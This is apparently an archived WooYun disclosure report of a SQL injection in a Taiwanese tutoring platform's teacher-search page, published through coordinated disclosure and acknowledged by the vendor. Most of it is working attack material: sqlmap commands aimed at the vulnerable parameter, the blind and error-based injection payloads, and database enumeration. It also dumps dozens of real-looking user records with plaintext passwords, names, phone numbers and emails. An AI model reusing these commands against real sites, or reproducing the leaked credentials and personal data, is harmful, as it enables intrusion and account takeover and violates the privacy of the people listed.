乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-30: 细节已通知厂商并且等待厂商处理中 2015-12-02: 厂商已经确认,细节仅向厂商公开 2015-12-12: 细节向核心白帽子及相关领域专家公开 2015-12-22: 细节向普通白帽子公开 2016-01-01: 细节向实习白帽子公开 2016-01-16: 细节向公众公开
創意王數位科技有限公司旗下家教銀行存在SQL註射漏洞(4萬多名教師,3萬多名用戶的明文密碼及個人隱私泄露)
地址:http://**.**.**.**/tsearch_language.php?s1=XNzx&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2
$ python sqlmap.py -u "http://**.**.**.**/tsearch_language.php?s1=XNzx&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2" -p s1 --technique=BE --random-agent --batch -D tutorbankcomtw -T teacher -C t_user,t_passwd,t_name1,t_name2,t_phone --dump --start 1 --stop 20
$ python sqlmap.py -u "http://**.**.**.**/tsearch_language.php?s1=XNzx&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2" -p s1 --technique=BE --random-agent --batch -D tutorbankcomtw -T member -C m_user,m_passwd,m_mobile,m_login,m_email --dump --start 1 --stop 20
Database: tutorbankcomtw+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| teacher | 42398 || member | 32900 |
Database: tutorbankcomtwTable: teacher[20 entries]+---------------+-------------+---------+---------+-------------+| t_user | t_passwd | t_name1 | t_name2 | t_phone |+---------------+-------------+---------+---------+-------------+| <blank> | <blank> | <blank> | <blank> | <blank> || <blank> | <blank> | <blank> | <blank> | NULL || <blank> | zdwofcbz | <blank> | <blank> | NULL || Anitaloa0620 | c0931266116 | 駱 | 芷葳 | 0917556907 || b35417 | wnrlkwyhd | 陳 | 皓暘 | 0986612653 || c20044413 | franky1020 | 范 | 元璟 | NULL || candyhom | 5200517 | 鍾 | 宛均 | <blank> || Caven | 87304034 | 劉 | 宜勝 | 0939103896 || cchdenis | 6996110 | 蘇 | 柏丞 | 076996110 || friend68688 | yf1234 | 伍 | 建勳 | <blank> || ooobiff | 19867742 | 吳 | 韻柔 | 0937456439 || tsengasir | s22083214 | 曾 | 星瑜 | 0988778363 || yenx2 | delia999 | 張 | 心玥 | <blank> || yingzhen0531 | 12a3sd | 李 | 瑛珍 | <blank> || 000000 | 000000 | Ann | lai | 02-25874786 || 000027 | 000027 | 楊 | 俊煌 | 0939711313 || 0000val | 00000505 | 何 | 敏嘉 | NULL || 000321478965 | 19880104 | 邱 | 奕鳴 | 0953226959 || 001014 | greg001014 | 劉 | 俊麟 | 04-8344890 || 0017 | supergirl | 羅 | 奕芳 | 04-25223515 |+---------------+-------------+---------+---------+-------------+
Database: tutorbankcomtwTable: member[20 entries]+------------------+------------+-------------+---------------------+-----------------------------+| m_user | m_passwd | m_mobile | m_login | m_email |+------------------+------------+-------------+---------------------+-----------------------------+| <blank> | 7i78qaKl | <blank> | 2015-06-10 07:48:36 | otomozi@**.**.**.** || mimilu28 | 123popo123 | 0983550798 | 2014-03-02 21:25:37 | mimilu28@**.**.**.** || aries_mlee | aries1676 | <blank> | 2014-03-02 21:25:37 | aries_mlee@**.**.**.** || Burberry001 | phoebe02 | 0955875406 | 2014-09-11 11:41:34 | Burberry00168@**.**.**.** || candy0925136751 | 0925136751 | 0925-136751 | 2014-03-02 21:25:37 | candy0925@**.**.**.** || cchsu53 | a861028 | 0910295547 | 2014-03-02 21:25:37 | cchsu53@**.**.**.** || cc_ice_cc | 57205720 | 0955-013880 | 2014-03-02 21:25:37 | ice83807@**.**.**.** || chadchen1026 | 579ch056 | 0930888452 | 2014-03-02 21:25:37 | chadchen1026@**.**.**.** || chin0889 | jane0889 | 0971155602 | 2014-03-02 21:25:37 | chin0889@**.**.**.** || cicitina | 740308 | 0928607807 | 2014-03-02 21:25:37 | cici_tina@**.**.**.** || delia | 880217 | 0928166695 | 2014-03-02 21:25:37 | delia.vincent@**.**.**.** || grace-chou | 5892186 | 0910294528 | 2014-03-02 21:25:37 | jimes_chiu@**.**.**.** || j120951954 | 561256 | 0936595361 | 2014-03-02 21:25:37 | care.lee@**.**.**.** || jamsab | sabrina | 0935360842 | 2014-03-02 21:25:37 | jamsab@**.**.**.** || joan621120 | 621120 | 0922694790 | 2014-03-02 21:25:37 | joan621120@**.**.**.** || joechen | 1234qwer | <blank> | 2014-03-02 21:25:37 | joechen7@**.**.**.** || kelly11252003 | abc478751 | <blank> | 2014-03-02 21:25:37 | kelly11252003@**.**.**.** || kevinmao | aa590720 | 0937-310679 | 2014-03-02 21:25:37 | kevinmao@**.**.**.** || kiwicat | dn1186 | <blank> | 2014-03-19 10:05:33 | kiwicat98@**.**.**.** || ky6773 | 22421637 | 0922495526 | 2014-03-02 21:25:37 | ky6773@**.**.**.** |+------------------+------------+-------------+---------------------+-----------------------------+
---Parameter: s1 (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: s1=XNzx%00') AND 4998=4998#&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: s1=XNzx%00') AND (SELECT 9431 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(9431=9431,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('BaDQ'='BaDQ&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2---web application technology: Apacheback-end DBMS: MySQL 5.0current user: 'tutorbankcomtw@%'current user is DBA: Falsedatabase management system users [1]:[*] 'tutorbankcomtw'@'%'Database: tutorbankcomtw+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| teacher | 42398 || member | 32900 || t_logintime | 28380 || member_app | 13131 || m_logintime | 12955 || teacher_favor | 12588 || teacher_app | 9493 || case_favor | 5756 || newcase | 5538 || smilepay | 1788 || iepay_1 | 862 || iepay_2 | 195 || index1ad | 5 || indexad | 5 || teacherad | 4 || memberad | 3 || casead | 2 || upad | 2 || index2ad | 1 || index3ad | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 768 || SESSION_VARIABLES | 329 || GLOBAL_VARIABLES | 317 || GLOBAL_STATUS | 312 || SESSION_STATUS | 312 || COLLATION_CHARACTER_SET_APPLICABILITY | 197 || COLLATIONS | 197 || PARTITIONS | 60 || TABLES | 60 || CHARACTER_SETS | 39 || PLUGINS | 23 || KEY_COLUMN_USAGE | 19 || STATISTICS | 19 || TABLE_CONSTRAINTS | 19 || SCHEMA_PRIVILEGES | 18 || ENGINES | 9 || PROCESSLIST | 2 || SCHEMATA | 2 || USER_PRIVILEGES | 1 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: tutorbankcomtwTable: member[1 column]+----------+-------------+| Column | Type |+----------+-------------+| m_passwd | varchar(16) |+----------+-------------+Database: tutorbankcomtwTable: teacher[1 column]+----------+-------------+| Column | Type |+----------+-------------+| t_passwd | varchar(16) |+----------+-------------+
web application technology: Apacheback-end DBMS: MySQL 5.0Database: tutorbankcomtwTable: teacher[83 columns]+--------------+---------------------+| Column | Type |+--------------+---------------------+| area1 | tinyint(1) || area2 | tinyint(1) || area3 | tinyint(1) || area4 | tinyint(1) || area5 | tinyint(1) || area6 | tinyint(1) || authcode | varchar(8) || city | varchar(9) || city1 | varchar(15) || city2 | varchar(15) || city3 | varchar(15) || city4 | varchar(15) || city5 | varchar(15) || city6 | varchar(15) || class1 | varchar(240) || class10 | varchar(240) || class11 | varchar(240) || class12 | varchar(240) || class13 | varchar(240) || class2 | varchar(240) || class3 | varchar(240) || class4 | varchar(240) || class5 | varchar(240) || class6 | varchar(240) || class7 | varchar(240) || class8 | varchar(240) || class9 | varchar(240) || conton | varchar(9) || picpath | varchar(30) || state | tinyint(1) || t_contact1 | varchar(4) || t_contact2 | varchar(4) || t_content | text || t_count | int(7) || t_del | tinyint(1) || t_email | varchar(40) || t_exp | tinyint(1) || t_fore | tinyint(1) || t_fri | varchar(24) || t_gentle | varchar(6) || t_grader | varchar(66) || t_id | int(7) unsigned || t_ip | varchar(20) || t_job | varchar(12) || t_joindate | datetime || t_level | tinyint(1) || t_leveltime | datetime || t_leveltime2 | datetime || t_licence | text || t_login | datetime || t_mobile | varchar(12) || t_mon | varchar(24) || t_month | tinyint(1) || t_name1 | varchar(10) || t_name2 | varchar(10) || t_open1 | tinyint(1) || t_open2 | tinyint(1) || t_open3 | tinyint(1) || t_passwd | varchar(16) || t_phone | varchar(20) || t_poll | tinyint(1) || t_push | tinyint(1) || t_pushtime | datetime || t_recivie | tinyint(1) || t_salary1 | int(4) || t_salary2 | int(4) || t_sat | varchar(24) || t_sch1 | varchar(90) || t_sch2 | varchar(42) || t_sch3 | varchar(9) || t_sex | varchar(6) || t_sid | varchar(11) || t_status | tinyint(1) || t_sun | varchar(24) || t_teach | varchar(39) || t_thu | varchar(24) || t_try | varchar(9) || t_tue | varchar(24) || t_update | datetime || t_user | varchar(16) || t_vip | tinyint(1) || t_wed | varchar(24) || t_year | tinyint(1) unsigned |+--------------+---------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: s1 (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: s1=XNzx%00') AND 4998=4998#&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: s1=XNzx%00') AND (SELECT 9431 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(9431sqlmap resumed the following injection point(s) from stored session:---Parameter: s1 (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: s1=XNzx%00') AND 4998=4998#&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: s1=XNzx%00') AND (SELECT 9431 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(9431=9431,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('BaDQ'='BaDQ&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2---web application technology: Apacheback-end DBMS: MySQL 5.0Database: tutorbankcomtwTable: teacher[20 entries]+---------------+-------------+---------+---------+-------------+| t_user | t_passwd | t_name1 | t_name2 | t_phone |+---------------+-------------+---------+---------+-------------+| <blank> | <blank> | <blank> | <blank> | <blank> || <blank> | <blank> | <blank> | <blank> | NULL || <blank> | zdwofcbz | <blank> | <blank> | NULL || Anitaloa0620 | c0931266116 | 駱 | 芷葳 | 0917556907 || b35417 | wnrlkwyhd | 陳 | 皓暘 | 0986612653 || c20044413 | franky1020 | 范 | 元璟 | NULL || candyhom | 5200517 | 鍾 | 宛均 | <blank> || Caven | 87304034 | 劉 | 宜勝 | 0939103896 || cchdenis | 6996110 | 蘇 | 柏丞 | 076996110 || friend68688 | yf1234 | 伍 | 建勳 | <blank> || ooobiff | 19867742 | 吳 | 韻柔 | 0937456439 || tsengasir | s22083214 | 曾 | 星瑜 | 0988778363 || yenx2 | delia999 | 張 | 心玥 | <blank> || yingzhen0531 | 12a3sd | 李 | 瑛珍 | <blank> || 000000 | 000000 | Ann | lai | 02-25874786 || 000027 | 000027 | 楊 | 俊煌 | 0939711313 || 0000val | 00000505 | 何 | 敏嘉 | NULL || 000321478965 | 19880104 | 邱 | 奕鳴 | 0953226959 || 001014 | greg001014 | 劉 | 俊麟 | 04-8344890 || 0017 | supergirl | 羅 | 奕芳 | 04-25223515 |+---------------+-------------+---------+---------+-------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: s1 (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: s1=XNzx%00') AND 4998=4998#&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: s1=XNzx%00') AND (SELECT 9431 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(9431=9431,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('BaDQ'='BaDQ&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2---web application technology: Apacheback-end DBMS: MySQL 5.0Database: tutorbankcomtwTable: member[31 columns]+-------------+--------------+| Column | Type |+-------------+--------------+| city | varchar(9) || conton | varchar(9) || m_address | varchar(100) || m_cert | varchar(10) || m_class | tinyint(1) || m_contact1 | varchar(4) || m_contact2 | varchar(4) || m_count | int(7) || m_del | tinyint(1) || m_email | varchar(40) || m_fax | varchar(20) || m_id | int(7) || m_ins | text || m_inter | tinyint(1) || m_ip | varchar(20) || m_joindate | datetime || m_level | tinyint(1) || m_leveltime | datetime || m_login | datetime || m_mobile | varchar(12) || m_name | varchar(42) || m_open1 | tinyint(1) || m_open2 | tinyint(1) || m_open3 | tinyint(1) || m_open4 | tinyint(1) || m_passwd | varchar(16) || m_phone | varchar(20) || m_poll | tinyint(1) || m_recivie | tinyint(1) || m_update | datetime || m_user | varchar(16) |+-------------+--------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: s1 (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: s1=XNzx%00') AND 4998=4998#&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: s1=XNzx%00') AND (SELECT 9431 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(9431=9431,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('BaDQ'='BaDQ&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2---web application technology: Apacheback-end DBMS: MySQL 5.0Database: tutorbankcomtwTable: member[20 entries]+------------------+------------+-------------+---------------------+-----------------------------+| m_user | m_passwd | m_mobile | m_login | m_email |+------------------+------------+-------------+---------------------+-----------------------------+| <blank> | 7i78qaKl | <blank> | 2015-06-10 07:48:36 | otomozi@**.**.**.** || mimilu28 | 123popo123 | 0983550798 | 2014-03-02 21:25:37 | mimilu28@**.**.**.** || aries_mlee | aries1676 | <blank> | 2014-03-02 21:25:37 | aries_mlee@**.**.**.** || Burberry001 | phoebe02 | 0955875406 | 2014-09-11 11:41:34 | Burberry00168@**.**.**.** || candy0925136751 | 0925136751 | 0925-136751 | 2014-03-02 21:25:37 | candy0925@**.**.**.** || cchsu53 | a861028 | 0910295547 | 2014-03-02 21:25:37 | cchsu53@**.**.**.** || cc_ice_cc | 57205720 | 0955-013880 | 2014-03-02 21:25:37 | ice83807@**.**.**.** || chadchen1026 | 579ch056 | 0930888452 | 2014-03-02 21:25:37 | chadchen1026@**.**.**.** || chin0889 | jane0889 | 0971155602 | 2014-03-02 21:25:37 | chin0889@**.**.**.** || cicitina | 740308 | 0928607807 | 2014-03-02 21:25:37 | cici_tina@**.**.**.** || delia | 880217 | 0928166695 | 2014-03-02 21:25:37 | delia.vincent@**.**.**.** || grace-chou | 5892186 | 0910294528 | 2014-03-02 21:25:37 | jimes_chiu@**.**.**.** || j120951954 | 561256 | 0936595361 | 2014-03-02 21:25:37 | care.lee@**.**.**.** || jamsab | sabrina | 0935360842 | 2014-03-02 21:25:37 | jamsab@**.**.**.** || joan621120 | 621120 | 0922694790 | 2014-03-02 21:25:37 | joan621120@**.**.**.** || joechen | 1234qwer | <blank> | 2014-03-02 21:25:37 | joechen7@**.**.**.** || kelly11252003 | abc478751 | <blank> | 2014-03-02 21:25:37 | kelly11252003@**.**.**.** || kevinmao | aa590720 | 0937-310679 | 2014-03-02 21:25:37 | kevinmao@**.**.**.** || kiwicat | dn1186 | <blank> | 2014-03-19 10:05:33 | kiwicat98@**.**.**.** || ky6773 | 22421637 | 0922495526 | 2014-03-02 21:25:37 | ky6773@**.**.**.** |+------------------+------------+-------------+---------------------+-----------------------------+
增加过滤。
危害等级:高
漏洞Rank:16
确认时间:2015-12-02 01:41
感謝通報
暂无